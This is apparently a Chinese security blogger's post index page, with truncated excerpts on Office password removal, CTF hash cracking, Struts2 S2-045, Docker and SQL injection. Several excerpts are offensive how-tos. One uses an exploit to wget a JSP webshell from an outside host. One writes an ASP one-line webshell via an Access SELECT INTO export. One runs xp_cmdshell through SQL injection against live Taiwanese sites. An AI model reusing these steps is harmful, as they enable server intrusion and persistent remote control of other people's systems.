Safe
关注
分享
扫一扫
qzxdh
这个作者很懒,什么都没留下…
展开
-
人生——关于虚荣
不要被虚荣所吞噬原创 2022-12-27 16:52:06 · 150 阅读 · 0 评论 -
破解pptx只读需要密码
破解pptx只读需要密码重命名qzxdh.pptx为qzxdh.zip,解压后,切换到\ppt之下,用记事本开启presentation.xml文件;把<p:modifyVerifier ... />整块选中并删除,保存并关闭;将文件再打包成qzxdh.zip,更名为pptx即可。转载 2017-05-22 11:18:30 · 16098 阅读 · 3 评论 -
一个ctf题目解析,关于des(unix)解密
题目在https://www.net-force.nl/challenge/level103/查看源文件soulslayer:2aBl6E94IuUfo密文为13位利用john可破解原创 2017-04-14 09:39:58 · 5878 阅读 · 0 评论 -
struts2 S2-045漏洞
Apache Struts 2被曝存在远程命令执行漏洞,漏洞编号S2-045,CVE编号CVE-2017-5638,在使用基于Jakarta插件的文件上传功能时,有可能存在远程命令执行,导致系统被黑客入侵。漏洞编号: CVE-2017-5638漏洞名称:基于 Jakarta plugin插件的Struts远程代码执行漏洞官方评级:高危漏洞描述:原创 2017-03-07 13:59:53 · 6382 阅读 · 7 评论 -
利用docker部署wooyun的web应用
wooyun被关很长时间,幸好网上有多个备份供下载。备份有数G,为html格式。利用docker部署nginx容器,将wooyun的备份解压到物理机的文件夹内,利用-v实现挂载。下载的nginx默认的配置文件路径为“/etc/nginx/conf.d/default.conf”/usr/share/nginx/html/var/log/nginx/log/利原创 2017-03-06 09:23:31 · 861 阅读 · 0 评论 -
本机代理设置小工具SetProxy
本机代理设置小工具原创 2017-03-08 12:37:24 · 2226 阅读 · 0 评论 -
struts2 s2-45漏洞利用
网上放出了python版的struts2 s2-45漏洞利用exp,可执行win或linux命令。实践了几个linux服务器,记录下linux下获取webshell过程。访问web,随便挑一个图片文件名,如qzxdh.jpg,利用exp执行find / -name qzxdh.jpg,获取web物理路径。利用wget http://qzxdh.com/jspshell.txt原创 2017-03-08 09:54:12 · 2911 阅读 · 0 评论 -
利用docker容器ubuntu安装truecrypt
利用docker pull安装了ubuntu,执行dockerrun -i -t XXX /bin/bash执行wget、ifconfig等命令均无效,先apt-get update,再利用apt-get install 安装相应文件更改源等docker attach命令-登录一个已经在执行的容器需安装fusewget https://download原创 2017-02-23 14:19:23 · 1105 阅读 · 0 评论 -
Mysql密码加密规则
在cmd5上可发现针对mysql密码的破解有3种方式,分别为mysql,mysql5,sha1,很是费解。网上查询之:MYSQL数据库的认证密码有两种方式,MYSQL 4.1版本之前是MYSQL323加密,MYSQL 4.1和之后的版本都是MYSQLSHA1加密,MYSQL数据库中自带Old_Password(str)和Password(str)函数,它们均可以在MYSQL数据库里进行查询,前者是MYSQL323加密,后者是MYSQLSHA1方式加密。MYSQL323加密中生成的是16位字符串,而在MYSQ原创 2010-07-28 09:37:00 · 3159 阅读 · 0 评论 -
SQL注入总结大全
<br />Sql注射总结(早源于'or'1'='1) <br />最重要的表名:<br />select * from sysobjects<br />sysobjects ncsysobjects<br />sysindexes tsysindexes<br />syscolumns<br />systypes<br />sysusers<br />sysdatabases<br />sysxlogins<br />sysprocesses<br /><br />最重要的一些用户名(默认sql数据库中存转载 2010-07-23 20:36:00 · 381 阅读 · 0 评论 -
利用的是ADOX.Catalog组件的马
" else Response.Write "创建失败,原因: " & err.description Response.End end if Set Conn = Server.CreateObject("ADODB.Connection") Conn.Open "Provider=Microsoft.Jet.OLEDB.4.0; Data Source=" &转载 2010-07-23 00:04:00 · 540 阅读 · 0 评论 -
Access导出Excel
<br />Access导出Excel<br />SELECT '<%execute request("a")%>' into [a] in 'c:/x.asp;a.xls' 'excel 8.0;' from a<br />会在C盘生成一个名为x.asp;a.xls的文件。<br />由于ACCESS不能多句执行,所以这个方法只有在后台提供了SQL执行功能并且知道绝对路径的时候才可以用。转载 2010-07-23 00:00:00 · 374 阅读 · 0 评论 -
MSSQL获取WEbshell把结果输出到400.HTM
把结果输出到400.HTM [ 2005.1.23 ]碰到几个台湾的SQL注入点,SA的用户。遮屏了返回信息,TCP/IP筛选开启。NBSI不能用,大概语句有冲突。首先手工的注入得到id=605;exec master..xp_cmdshell 'net start >%25windir%25/help/iisHelp/common/404b.htm。然后打开个不存在的页面,居然返回“出错了哦~~页面找不到了嘛……”我晕。这么亲切暧昧的,但是我不吃这套经过0.0001秒的思考之后,我想到了nc,想到了I转载 2010-07-22 23:59:00 · 396 阅读 · 0 评论